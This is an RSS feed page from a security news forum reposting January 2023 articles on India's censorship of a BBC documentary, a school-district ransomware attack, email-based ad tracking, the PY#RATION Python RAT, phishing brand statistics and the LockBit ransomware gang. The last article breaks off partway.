<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/88/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>Indian ban on BBC Modi film puts Musk&#x2019;s Twitter &#x2018;free speech&#x2019; to the test</title><link>https://nsaneforums.com/news/security-privacy-news/indian-ban-on-bbc-modi-film-puts-musk%E2%80%99s-twitter-%E2%80%98free-speech%E2%80%99-to-the-test-r12156/</link><description><![CDATA[<p>
	<span style="font-size:20px;"><strong>Use of emergency laws sheds light on fragile and fractious place social media now occupy in India</strong></span>
</p>

<p>
	 
</p>

<p>
	The response by the Indian government was quick and draconian. Days after a BBC documentary examining the role that Narendra Modi, now prime minister, had played in 2002 communal riots in Gujarat was released, the information ministry announced that all links to the footage were to be banned on social media.
</p>

<p>
	 
</p>

<p>
	Emergency laws brought in by the Modi government just two years ago were used to enforce the ban.
</p>

<p>
	 
</p>

<p>
	Both Twitter and YouTube quickly complied with the government’s censorship requests. Posts on about 50 Twitter accounts were removed, with activists, politicians and even Hollywood actors among those affected, as well as an unspecified number of YouTube channels. Widely shared clips of the documentary, which alleged that Modi, in his role as chief minister of Gujarat at the time, had enabled and then did nothing to stop the violence in which almost 1,000 Muslims were killed, quickly disappeared from Indian social media.
</p>

<p>
	 
</p>

<p>
	It is not the first time the Modi government has used the 2021 information technology rules to censor online content critical of the administration. However, the action taken over the BBC documentary is among the most high-profile uses of the legislation and sheds light on the fragile and fractious place that social media such as Twitter now occupy in India. It directly pits the vow of the platform’s new billionaire owner, Elon Musk, to be a “free speech absolutist” against increasingly authoritarian laws governing the country’s online sphere.
</p>

<p>
	 
</p>

<p>
	Widely criticised by human rights groups and digital activists, the 2021 IT rules give the government power to remove any content it deems to threaten “the unity, integrity, defence, security or sovereignty of India”.
</p>

<p>
	 
</p>

<p>
	Even before the passing of the legislation, legal demands made by the Modi government to remove content from Twitter increased by 48,000% between 2014 and 2020, according to analysis of the company’s transparency reports.
</p>

<p>
	 
</p>

<p>
	The two-part BBC series documenting the rise of Modi has proved highly controversial in India, despite it only being released in the UK, prompting allegations from the Indian foreign ministry that it was “biased propaganda” that showed a “blatant colonial mindset”.
</p>

<p>
	 
</p>

<p>
	Kanchan Gupta, a spokesperson for the information ministry, called the documentary “hostile propaganda and anti-India garbage” and students who arranged a screening at a university in Kerala this week were accused of being “treasonous”. At Delhi’s prestigious Jawaharlal Nehru University, students who tried the same were hit with an electricity and internet blackout, and had stones thrown at them by others from rightwing groups.
</p>

<p>
	 
</p>

<p>
	The BBC has said its documentary was “rigorously researched according to highest editorial standards”.
</p>

<p>
	 
</p>

<p>
	Many have cited their compliance with the online censorship of the documentary as an example of how Twitter and YouTube are helping to further erode freedom of speech in India, in order to appease the Modi government and not compromise access to the vast and increasingly online Indian population. There are over 40 million Twitter users in India, making it their third largest market after Japan and the US.
</p>

<p>
	 
</p>

<p>
	“This use of an emergency law as a censorship mechanism is a very worrying development but it’s far from the first time this has happened,” said Prateek Waghre, the policy director at the advocacy group the Internet Freedom Foundation in India. According to a statement to parliament in July, action was taken against 94 YouTube channels, 19 social media accounts and 747 URLs on the government’s request since the IT rules were passed.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="2083.jpg?width=620&amp;quality=85&amp;dpr=1&amp;s=no" class="ipsImage" data-ratio="60.00" height="372" width="620" src="https://i.guim.co.uk/img/media/82726fe83b88313c67a57daadddfb8716b895a70/692_201_2083_1251/master/2083.jpg?width=620&amp;quality=85&amp;dpr=1&amp;s=none" />
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>Elon Musk ‘entering Twitter HQ’. Photograph: @elonmusk / Twitter</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p>
	Before Musk’s takeover, Twitter had pushed back – though somewhat inconsistently – against the Modi government’s increasingly heavy-handed approach towards social media. Twitter had restored some of the accounts the administration had demanded the removal of and in July last year filed a lawsuit in Indian courts alleging New Delhi had abused its power by ordering the company to arbitrarily and disproportionately take down accounts belonging to government critics.
</p>

<p>
	 
</p>

<p>
	Twitter still reports all the posts and accounts it removes at the request of the Indian government to the online database Lumen. YouTube, however, does not.
</p>

<p>
	 
</p>

<p>
	Yet for all his protestations to be a crusader for free speech, there are indicators that Musk’s Twitter might be far less bullish in standing up to the Modi government. When Musk was trying to back out of the deal to buy the platform, he made it clear in the court filings that he was unhappy with the lawsuit against the Indian government, saying he believed moderation should “hew close to the laws of countries in which Twitter operates”.
</p>

<p>
	 
</p>

<p>
	Among the Indian accounts that have been reinstated since Musk took over is that of Kangana Ranaut, a fiercely pro-Modi actor who has espoused anti-Muslim sentiments and was suspended in 2021 for posts that were seen as a call to violence against minorities.
</p>

<p>
	 
</p>

<p>
	Since taking over, Musk has not mentioned the lawsuit once but did fire almost all 200 of Twitter’s employees in India. Separately, Musk’s car company, Tesla, is lobbying India’s government to reduce import taxes on electric vehicles so it can have access to the lucrative Indian market.
</p>

<p>
	 
</p>

<p>
	Waghre said Musk’s position on championing free speech on Twitter, already wildly inconsistent, was likely to be “severely tested in India”, as the furore around the BBC documentary had proven.
</p>

<p>
	 
</p>

<p>
	“We’re talking about pressures on freedom of speech in the world’s largest democracy,” Waghre said. “Musk’s pledge has rung hollow everywhere, but in India the impact will certainly be larger.”
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.theguardian.com/world/2023/jan/25/india-ban-on-bbc-modi-film-elon-musk-twitter-free-speech-emergency-laws" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">12156</guid><pubDate>Wed, 25 Jan 2023 18:54:52 +0000</pubDate></item><item><title>Wawasee Community School Corporation Faces Ransomware Attack</title><link>https://nsaneforums.com/news/security-privacy-news/wawasee-community-school-corporation-faces-ransomware-attack-r12154/</link><description><![CDATA[<p>
	SYRACUSE — At approximately 6 a.m. Friday, Jan. 20, Wawasee School Corporation was alerted to a possible ransomware attack on one of their district computers.
</p>

<p>
	 
</p>

<p>
	They immediately took action to shut down the network and began investigating the possible breach. As part of that protocol, they alerted the Indiana Department of Education and the FBI / Department of Homeland Security.
</p>

<p>
	 
</p>

<p>
	As they continued the investigation, they confirmed that the corporation had been subject to a ransomware attack that impacted all of their Windows-based computers, servers, and other technology systems.
</p>

<p>
	 
</p>

<p>
	This caused significant disruption to daily operations, but teachers, staff and students have been great in adapting to the challenging circumstances.
</p>

<p>
	 
</p>

<p>
	At this time, they do not believe student and employee information and data systems are impacted as they are not located on local servers.
</p>

<p>
	 
</p>

<p>
	As they look to the future, technology staff will be working around the clock to rebuild their servers and get their systems back up and running.
</p>

<p>
	 
</p>

<p>
	They anticipate that over the next several days they will continue to experience some disruptions to their internet-based systems.
</p>

<p>
	 
</p>

<p>
	There does not appear to be an impact on student Chromebooks and those should function as normal when they bring them home.
</p>

<p>
	 
</p>

<p>
	The corporation extends thanks to their dedicated technology staff as they work through this challenging situation. They also want to thank their students and Wawasee staff for being flexible and shifting plans when necessary.
</p>

<p>
	 
</p>

<p>
	They appreciate the continued support and patience as they rebuild their systems and get their network back online. They remain committed to keeping all Wawasee families informed throughout this process. Updates will be made as new information is collected.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.inkfreenews.com/2023/01/23/wawasee-community-school-corporation-faces-ransomware-attack/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">12154</guid><pubDate>Wed, 25 Jan 2023 17:56:16 +0000</pubDate></item><item><title>Everyone Wants Your Email Address. Think Twice Before Sharing It.</title><link>https://nsaneforums.com/news/security-privacy-news/everyone-wants-your-email-address-think-twice-before-sharing-it-r12152/</link><description><![CDATA[<p>
	<span style="font-size:24px;">Your email address has become a digital bread crumb for companies to link your activity across sites. Here’s how you can limit this.</span>
</p>

<p>
	 
</p>

<p>
	When you browse the web, an increasing number of sites and apps are asking for a piece of basic information that you probably hand over without hesitation: your email address.
</p>

<p>
	 
</p>

<p>
	It may seem harmless, but when you enter your email, you’re sharing a lot more than just that. I’m hoping this column, which includes some workarounds, persuades you to think twice before handing over your email address.
</p>

<p>
	 
</p>

<p>
	First, it helps to know why companies want email addresses. To advertisers, web publishers and app makers, your email is important not just for contacting you. It acts as a digital bread crumb for companies to link your activity across sites and apps to serve you relevant ads.
</p>

<p>
	 
</p>

<p>
	If this all sounds familiar, that’s because it is.
</p>

<p>
	 
</p>

<p>
	For decades, the digital advertising industry relied on invisible trackers planted inside websites and apps to follow our activities and then serve us targeted ads. There have been sweeping changes to this system in the past few years, including Apple’s release of a software feature in 2021 allowing iPhone users to block apps from tracking them and Google’s decision to prevent websites from using cookies, which follow people’s activities across sites, in its Chrome browser by 2024.
</p>

<p>
	 
</p>

<p>
	Advertisers, web publishers and app makers now try to track people through other means — and one simple method is by asking for an email address.
</p>

<p>
	 
</p>

<p>
	Imagine if an employee of a brick-and-mortar store asked for your name before you entered. An email address can be even more revealing, though, because it can be linked to other data, including where you went to school, the make and model of the car you drive, and your ethnicity.
</p>

<p>
	 
</p>

<p>
	“I can take your email address and find data you may not have even realized you’ve given to a brand,” said Michael Priem, the chief executive of Modern Impact, an advertising firm in Minneapolis. “The amount of data that is out there on us as consumers is literally shocking.”
</p>

<p>
	 
</p>

<p>
	Advertising tech is continuing to evolve, so it helps to understand what exactly you’re sharing when you enter in an email address. From there, you can decide what to do.
</p>

<p>
	<br />
	Your email address has become a potent piece of data.
</p>

<p>
	 
</p>

<p>
	For many years, the digital ad industry has compiled a profile on you based on the sites you visit on the web. Information about you used to be collected in covert ways, including the aforementioned cookies and invisible trackers planted inside apps. Now that more companies are blocking the use of those methods, new ad targeting techniques have emerged.
</p>

<p>
	 
</p>

<p>
	One technology that is gaining traction is an advertising framework called Unified ID 2.0, or UID 2.0, which was developed by the Trade Desk, an ad-technology company in Ventura, Calif.
</p>

<p>
	 
</p>

<p>
	Say, for example, you are shopping on a sneaker website using UID 2.0 when a prompt pops up and asks you to share your email address and agree to receive relevant advertising. Once you enter your email, UID 2.0 transforms it into a token composed of a string of digits and characters.
</p>

<p>
	 
</p>

<p>
	That token travels with your email address when you use it to log in to a sports streaming app on your TV that uses UID 2.0. Advertisers can link the two accounts together based on the token, and they can target you with sneaker ads on the sports streaming app because they know you visited the sneaker website.
</p>

<p>
	 
</p>

<p>
	Since your email address is not revealed to the advertiser, UID 2.0 may be seen as a step up for consumers from traditional cookie-based tracking, which gives advertisers access to your detailed browsing history and personal information.
</p>

<p>
	 
</p>

<p>
	“Websites and apps are increasingly asking for email authentication in part because there needs to be a better way for publishers to monetize their content that’s more privacy-centric than cookies,” Ian Colley, the chief marketing officer of the Trade Desk, said in an email. “The internet is not free, after all.”
</p>

<p>
	 
</p>

<p>
	However, in an analysis, Mozilla, the nonprofit that makes the Firefox web browser, called UID 2.0 a “regression in privacy” because it enabled the type of tracking behavior that modern web browsers were designed to prevent.
</p>

<p>
	 
</p>

<p>
	There are simpler ways for websites and apps to track your web activity through your email address. An email could contain your first and last name, and assuming you’ve used it for some time, data brokers have already compiled a comprehensive profile on your interests based on your browsing activity. A website or an app can upload your email address into an ad broker’s database to match your identity with a profile containing enough insights to serve you targeted ads.
</p>

<p>
	 
</p>

<p>
	The bottom line is that if you’re wondering why you are continuing to see relevant ads despite the rise of privacy tools that combat digital tracking, it’s largely because you are still sharing your email address.
</p>

<p>
	<br />
	So what to do?
</p>

<p>
	 
</p>

<p>
	There are various options for limiting the ability of advertising companies to target you based on your email address:
</p>

<p>
	 
</p>

<ul>
	<li>
		<strong>Create a bunch of email addresses.</strong> Each time a site or an app asks for your email, you could create a unique address to log in to it, such as, for example, netflixbrianchen@gmail.com for movie-related apps and services. That would make it hard for ad tech companies to compile a profile based on your email handle. And if you receive spam mail to a specific account, that will tell you which company is sharing your data with marketers. This is an extreme approach, because it’s time-consuming to manage so many email addresses and their passwords.
	</li>
</ul>

<p>
	 
</p>

<ul>
	<li>
		<strong>Use email-masking tools.</strong> Apple and Mozilla offer tools that automatically create email aliases for logging in to an app or a site; emails sent to the aliases are forwarded to your real email address. Apple’s Hide My Email tool, which is part of its iCloud+ subscription service that costs 99 cents a month, will create aliases, but using it will make it more difficult to log in to the accounts from a non-Apple device. <span style="color:#2980b9;">Mozilla’s Firefox Relay</span> will generate five email aliases at no cost; beyond that, the program charges 99 cents a month for additional aliases.
	</li>
</ul>

<p>
	 
</p>

<ul>
	<li>
		<strong>When possible, opt out.</strong> For sites using the UID 2.0 framework for ad targeting, you can opt out by entering your email address at <a href="https://transparentadvertising.org" rel="external nofollow"><span style="color:#2980b9;">https://transparentadvertising.org</span></a>. (Not all sites that collect your email address are using UID 2.0, however.)
	</li>
</ul>

<p>
	 
</p>

<p>
	You could also do nothing. If you enjoy receiving relevant advertising and have no privacy concerns, you can accept that sharing some information about yourself is part of the transaction for receiving content on the internet.
</p>

<p>
	 
</p>

<p>
	I try to take a cautious but moderate approach. I juggle four email accounts devoted to my main interests — food, travel, fitness and movies. I’ll use the movie-related email address, for example, when I’m logging in to a site to buy movie tickets or stream videos. That way, those sites and apps will know about my movie preferences, but they won’t know everything about me.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.nytimes.com/2023/01/25/technology/personaltech/email-address-digital-tracking.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">12152</guid><pubDate>Wed, 25 Jan 2023 17:38:32 +0000</pubDate></item><item><title>New stealthy Python RAT malware targets Windows in attacks</title><link>https://nsaneforums.com/news/security-privacy-news/new-stealthy-python-rat-malware-targets-windows-in-attacks-r12149/</link><description><![CDATA[<p>
	<span style="font-size:14px;">A new Python-based malware has been spotted in the wild featuring remote access trojan (RAT) capabilities to give its operators control over the breached systems.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Named PY#RATION by researchers at threat analytics company Securonix, the new RAT uses the WebSocket protocol to communicate with the command and control (C2) server and to exfiltrate data from the victim host.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">A technical report from the company analyzes how the malware works. The researchers note that the RAT is actively developed as they've seen multiple versions of it since August when the PY#RATION campaign started.</span>
</p>

<h2>
	<span style="font-size:14px;">Distribution via shortcut files</span>
</h2>

<p>
	<span style="font-size:14px;">The PY#RATION malware is distributed via a phishing campaign that uses password-protected ZIP file attachments containing two shortcut .LNK files disguised as images, namely front.jpg.lnk and back.jpg.lnk.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="lnk-files.png" class="ipsImage" data-ratio="75.10" height="434" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/7/lnk-files.png" />
	<p>
		<span style="font-size:14px;">The two LNK files that fetch the two batch files (Securonix)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">When the shortcuts are launched, the victim sees the front and back of a driver's license. However, malicious code is also executed to contact the C2 (Pastebin in later attacks) and download two .TXT files ('front.txt' and 'back.txt') which are eventually renamed to BAT files to accommodate the malware execution.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Upon launch, the malware creates the 'Cortana' and 'Cortana/Setup' directories in the user's temporary directory and then downloads, unpacks, and runs additional executable files from that location.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Persistence is established by adding a batch file ('CortanaAssist.bat') into the user's startup directory.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The use of Cortana, Microsoft's personal assistant solution on Windows, aims at disguising the malware entries as system files.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="infection-chain.png" class="ipsImage" data-ratio="75.10" height="361" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/7/infection-chain.png" />
	<p>
		<span style="font-size:14px;">The campaign's complete infection chain (Securonix)</span>
	</p>
</div>

<h2>
	<span style="font-size:14px;">Stealthy PY#RATION RAT</span>
</h2>

<p>
	<span style="font-size:14px;">The malware delivered to the target is a Python RAT packed into an executable using automated packers like 'pyinstaller' and 'py2exe,' which can convert Python code into Windows executables that include all the libraries required for its execution.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This approach results in inflated payload sizes, with version 1.0 (initial) being 14MB, and version 1.6.0 (latest) being 32MB. The more recent version is bigger because it features additional code (+1000 lines) and a layer of Fernet encryption.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This helps the malware evade detection, and according to Securonix's tests, version 1.6.0 of the payload deployed undetected by all but one antivirus engine on VirusTotal.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">While Securonix did not share the hash of the malware samples, BleepingComputer was able to find the following file that appears to be from this campaign:</span>
</p>

<p>
	 
</p>

<p>
	<img alt="PyRation_detection.png" class="ipsImage" data-ratio="49.72" height="169" width="720" src="https://www.bleepstatic.com/images/news/u/1100723/2023/PyRation_detection.png" />
</p>

<p>
	<span style="font-size:14px;">Detection rate for Py#Ration RAT (BleepingComputer)</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Securonix's analysts extracted the payload's contents and examined the code functions using the 'pyinstxtractor' tool to determine the capabilities of the malware.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="extracted.png" class="ipsImage" data-ratio="75.10" height="540" width="613" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/7/extracted.png" />
	<p>
		<span style="font-size:14px;">Extracted components from the executable (Securonix)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">Among the features seen in version 1.6.0 of the PY#RATION RAT are the following:</span>
</p>

<p>
	 
</p>

<ul>
	<li>
		<span style="font-size:14px;">Perform network enumeration</span>
	</li>
	<li>
		<span style="font-size:14px;">Perform file transfers from the breached system to the C2, or vice versa</span>
	</li>
	<li>
		<span style="font-size:14px;">Perform keylogging to record the victim's keystrokes</span>
	</li>
	<li>
		<span style="font-size:14px;">Execute shell commands</span>
	</li>
	<li>
		<span style="font-size:14px;">Perform host enumeration</span>
	</li>
	<li>
		<span style="font-size:14px;">Extract passwords and cookies from web browsers</span>
	</li>
	<li>
		<span style="font-size:14px;">Steal data from the clipboard</span>
	</li>
	<li>
		<span style="font-size:14px;">Detect anti-virus tools running on the host</span>
	</li>
</ul>

<p>
	 
</p>

<div>
	<img alt="browser-stealer.png" class="ipsImage" data-ratio="75.10" height="366" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Malware/7/browser-stealer.png" />
	<p>
		<span style="font-size:14px;">Stealing data from Chrome, Brave, Opera, and Edge browsers (Securonix)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;"><a href="http://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/" rel="external nofollow">Securonix researchers say</a> that the malware "leverages Python's built-in Socket.IO framework, which provides features to both client and server WebSocket communication." This channel is used for both communication and data exfiltration.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The advantage of WebSockets is that the malware can simultaneously receive and send data from and to the C2 over a single TCP connection using ports commonly left open in networks like 80 and 443.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The analysts noticed that the threat actors used the same C2 address ("169[.]239.129.108") throughout their campaign, from malware version 1.0 to 1.6.0.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to the researchers, the IP has not been blocked on the IPVoid checking system, indicating that PY#RATION has gone undetected for several months.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">At the moment details about specific campaigns using this piece of malware and its targets, distribution volume, and the operators behind it remain unclear.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Securonix has published a separate post where they <a href="https://www.securonix.com/blog/detecting-python-based-pyration-attack-campaign-with-securonix/" rel="external nofollow">list IoCs</a> (indicators of compromise) for the PY#RATION campaign.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/new-stealthy-python-rat-malware-targets-windows-in-attacks/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12149</guid><pubDate>Wed, 25 Jan 2023 16:02:54 +0000</pubDate></item><item><title>Yahoo was the most phished brand of 4Q'22, according to research</title><link>https://nsaneforums.com/news/security-privacy-news/yahoo-was-the-most-phished-brand-of-4q22-according-to-research-r12123/</link><description><![CDATA[<p>
	Web services company Yahoo was the most impersonated brand in phishing attacks over the last three months of 2022. This is according to cybersecurity firm Check Point's latest <a href="http://blog.checkpoint.com/2023/01/23/brand-phishing-report-q4-2022/" rel="external nofollow">Brand Phishing report</a>, which highlights the brands that threat actors imitate the most to lure people into divulging their personal data.
</p>

<p>
	 
</p>

<p>
	The report said that 20% of brand phishing attempts imitated Yahoo. This is reportedly a result of phishing campaigns wherein cybercriminals sent emails containing the subject "Yahoo Award" and senders like "Award Promotion," "Award Center," "Info winning," or "Award Winning."
</p>

<p>
	 
</p>

<p>
	The email's content informed recipients that they had won hundreds of thousands of dollars courtesy of Yahoo. To be able to claim this, however, they had to send their personal information and banking details — an obvious ruse to steal the victim's sensitive data. The email even goes as far as telling recipients not to tell people about winning the prize due to legal issues.
</p>

<p>
	 
</p>

<p>
	DHL is the second most impersonated brand in Check Point's report at 16%, while Microsoft holds the third spot at 11%. Other brands that made the list include Google, LinkedIn, WeTransfer, <a href="https://www.neowin.net/news/new-phishing-scam-sends-out-fake-netflix-suspension-emails" rel="external nofollow">Netflix</a>, FedEx, HSBC, and WhatsApp.
</p>

<p>
	 
</p>

<p>
	Finally, the study found that technology was the industry most likely to be imitated by phishers in 4Q'22, followed by shipping and social networks.
</p>

<p>
	 
</p>

<p>
	To protect yourself from <a href="https://www.neowin.net/guides/5-simple-cybersecurity-tips-you-can-practice-in-2023" rel="external nofollow">phishing attacks</a>, always be cautious when opening links or downloading attachments from unsolicited emails as they could contain malware. Also, make it a habit to check the URL of the site you're on. For instance, if the URL doesn't start with yahoo.com, then it's likely fraudulent. Lastly, enable two-factor authentication if available to ensure that threat actors will not be able to infiltrate your account even if you accidentally give them your username and password.
</p>

<p>
	 
</p>

<p>
	Source: <a href="https://blog.checkpoint.com/2023/01/23/brand-phishing-report-q4-2022/" rel="external nofollow">Check Point Security</a>
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/yahoo-was-the-most-phished-brand-of-4q22-according-to-research/" rel="external nofollow">Yahoo was the most phished brand of 4Q'22, according to research</a>
</p>
]]></description><guid isPermaLink="false">12123</guid><pubDate>Tue, 24 Jan 2023 19:50:46 +0000</pubDate></item><item><title>The Unrelenting Menace of the LockBit Ransomware Gang</title><link>https://nsaneforums.com/news/security-privacy-news/the-unrelenting-menace-of-the-lockbit-ransomware-gang-r12115/</link><description><![CDATA[<p>
	High-profile ransomware attacks have become a fact of life in recent years, and it’s not unusual to hear about major monthly attacks perpetrated by Russia-based gangs and their affiliates. But since late 2019, one group has been steadily making a name for itself on a multi-year rampage that has impacted hundreds of organizations around the world. The LockBit ransomware gang may not be the most wildly unhinged of these criminal groups, but its callous persistence, effectiveness, and professionalism make it sinister in its own way.
</p>

<p>
	 
</p>

<p>
	One of the most prolific ransomware groups ever, the LockBit collective has attempted to maintain a low profile in spite of its volume of attacks.
</p>

<p>
	 
</p>

<p>
	But as it has grown, the group has gotten more aggressive and perhaps careless. Earlier this month, the LockBit malware was notably used in an attack on the United Kingdom’s Royal Mail that hobbled operations. After other recent visible attacks, like one on a Canadian children’s hospital, all eyes are now on LockBit.
</p>

<p>
	 
</p>

<p>
	“They are the most notorious ransomware group, because of sheer volume. And the reason for their success is that the leader is a good businessman,” says Jon DiMaggio, chief security strategist at Analyst1 who has studied LockBit’s operations extensively. “It’s not that he’s got this great leadership capability. They made a point-and-click ransomware that anyone could use, they update their software, they’re constantly looking for user feedback, they care about their user experience, they poach people from rival gangs. He runs it like a business, and because of that, it is very, very attractive to criminals.”
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>Keep It Professional</strong></span>
</p>

<p>
	 
</p>

<p>
	For the Royal Mail, LockBit was a chaos agent. On January 11, the UK postal service’s international shipping ground to a halt after being hit with a cyberattack. For more than a week, the company has told customers not to send new international parcels—adding further disorganization after workers went on strike over pay and conditions. The attack was later linked to LockBit.
</p>

<p>
	 
</p>

<p>
	Just before Christmas, a LockBit member attacked the SickKids hospital in Canada, impacting its internal systems and phone lines, causing delays to medical images and lab tests. The group quickly backtracked after the attack, providing a free decryptor and saying it had blocked the member responsible. In October, LockBit also demanded an unusually high $60 million payment from a UK car dealership chain.
</p>

<p>
	 
</p>

<p>
	Adding to its infamy, LockBit is also one of the most prolific and aggressive ransomware groups when it comes to targeting manufacturing and industrial control systems. Security firm Dragos estimated in October that in the second and third quarters of 2022, the LockBit malware was used in 33 percent of ransomware attacks on industrial organizations and 35 percent of those against infrastructure.
</p>

<p>
	 
</p>

<p>
	In November, the US Department of Justice reported that LockBit’s ransomware has been used against at least 1,000 victims worldwide, including in the United States. “LockBit members have made at least $100 million in ransom demands and have extracted tens of millions of dollars in actual ransom payments from their victims,” the Justice Department wrote. The FBI first began investigating the group in early 2020. In February 2022, the agency released an alert warning that LockBit “employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense.”
</p>

<p>
	 
</p>

<p>
	LockBit emerged at the end of 2019, first calling itself “ABCD ransomware.” Since then, it has grown rapidly. The group is a “ransomware-as-a-service” operation, meaning that a core team creates its malware and runs its website while licensing out its code to “affiliates” who launch attacks.
</p>


<p>
	 
</p>

<p>
	Typically, when ransomware-as-a-service groups successfully attack a business and get paid, they’ll share a cut of the profits with the affiliates.
</p>

<p>
	 
</p>

<p>
	In the case of LockBit, Jérôme Segura, senior director of threat intelligence at Malwarebytes, says the affiliate model is flipped on its head.
</p>

<p>
	 
</p>

<p>
	Affiliates collect payment from their victims directly and then pay a fee to the core LockBit team. The structure seemingly works well and is reliable for LockBit. “The affiliate model was really well ironed out,” Segura says.
</p>

<p>
	 
</p>

<p>
	Though researchers have repeatedly seen cybercriminals of all sorts professionalizing and streamlining their operations over the past decade, many prominent and prolific ransomware groups adopt flamboyant and unpredictable public personas to garner notoriety and intimidate victims. In contrast, LockBit is known for being relatively consistent, focused, and organized.
</p>

<p>
	 
</p>

<p>
	“Of all the groups, I think they have probably been the most businesslike, and that is part of the reason for their longevity,” says Brett Callow, a threat analyst at the antivirus company Emsisoft. “But the fact that they post a lot of victims on their site doesn’t necessarily equate to them being the most prolific ransomware group of all, as some would claim. They are probably quite happy with being described that way, though. That’s just good for recruitment of new affiliates.”
</p>

<p>
	 
</p>

<p>
	The group certainly isn’t all hype, though. LockBit seems to invest in both technical and logistical innovations in an attempt to maximize profits. Peter Mackenzie, director of incident response at security firm Sophos, says, for example, that the group has experimented with new methods for pressuring its victims into paying ransoms.
</p>

<p>
	 
</p>

<p>
	“They've got different ways of paying. You could pay to have your data deleted, pay to have it released early, pay to extend your deadline,” Mackenzie says, adding that LockBit opened its payment options to anyone. This could, theoretically at least, result in a rival company buying a ransomware victim’s data. “From the victim's perspective, it's extra pressure on them, which is what helps make people pay,” Mackenzie says.
</p>

<p>
	 
</p>

<p>
	Since LockBit debuted, its creators have spent significant time and effort developing its malware. The group has issued two big updates to the code—LockBit 2.0, released in mid-2021, and LockBit 3.0, released in June 2022. The two versions are also known as LockBit Red and LockBit Black, respectively. Researchers say the technical evolution has paralleled changes in how LockBit works with affiliates. Prior to the release of LockBit Black, the group worked with an exclusive group of 25 to 50 affiliates at most. Since the 3.0 release, though, the gang has opened up significantly, making it harder to keep tabs on the number of affiliates involved and also making it more difficult for LockBit to exercise control over the collective.
</p>

<p>
	 
</p>

<p>
	LockBit frequently expands its malware with new features, but above all, the malware’s characteristic trait is that it's simple and easy to use. At its core, the ransomware has always offered anti-detection capabilities, tools for circumventing Microsoft Windows defenses, and features for privilege escalation within a compromised device. LockBit uses publicly available hacking tools when it can, but it also develops custom capabilities. The 2022 FBI report noted that the group sometimes uses previously unknown or zero day vulnerabilities in its attacks. And the group has the capability to target many different types of systems.
</p>


<p>
	 
</p>

<p>
	“It's not just Windows. They'll attack Linux, they'll go after your virtual host machines,” Mackenzie says. “They offer a solid payment system. There's a lot of backend infrastructure that comes with this. It's just a well-made product, unfortunately.” In October, it was reported that LockBit’s malware was deployed after a zero day was used to hack Microsoft Exchange servers—a relatively rare occurrence when it comes to ransomware gangs.
</p>

<p>
	 
</p>

<p>
	“There are additional features that make the ransomware more dangerous—for example, having worm components to it,” Segura adds. “They've also discussed things like doing denial-of-service attacks against victims, in addition to the extortion.”
</p>

<p>
	 
</p>

<p>
	With the release of LockBit 3.0, the group also signaled its intention to evolve. It introduced the first ransomware bug bounty scheme, promising to pay legitimate security researchers or criminals who could identify flaws in its website or encryption software. LockBit said it would pay anyone $1 million if they could name who is behind LockBitSupp, the public persona of the group.
</p>

<p>
	 
</p>

<p>
	The core members at the top of LockBit seem to include its leader and one or two other trusted partners. Analyst1’s DiMaggio, who has tracked the actors for years, notes that the group claims to be based in the Netherlands. Its leader has said at various times that he personally operates out of China or even the United States, where he has said he is a part owner of two restaurants in New York City. LockBit members all seem to be Russian-speaking, though, and DiMaggio says that while he cannot be certain, he believes the group is based in Russia.
</p>

<p>
	 
</p>

<p>
	“The leader doesn’t seem to have any concern about being arrested. He thinks he’s a supervillain, and he plays the part well,” DiMaggio says. “But I do believe he has a healthy concern that if the Russian government were to get their hooks in him, he would have to make the decision to turn over most of his money to them or do work for them like helping them with the Ukraine war.”
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>Beware the Spotlight</strong></span>
</p>

<p>
	 
</p>

<p>
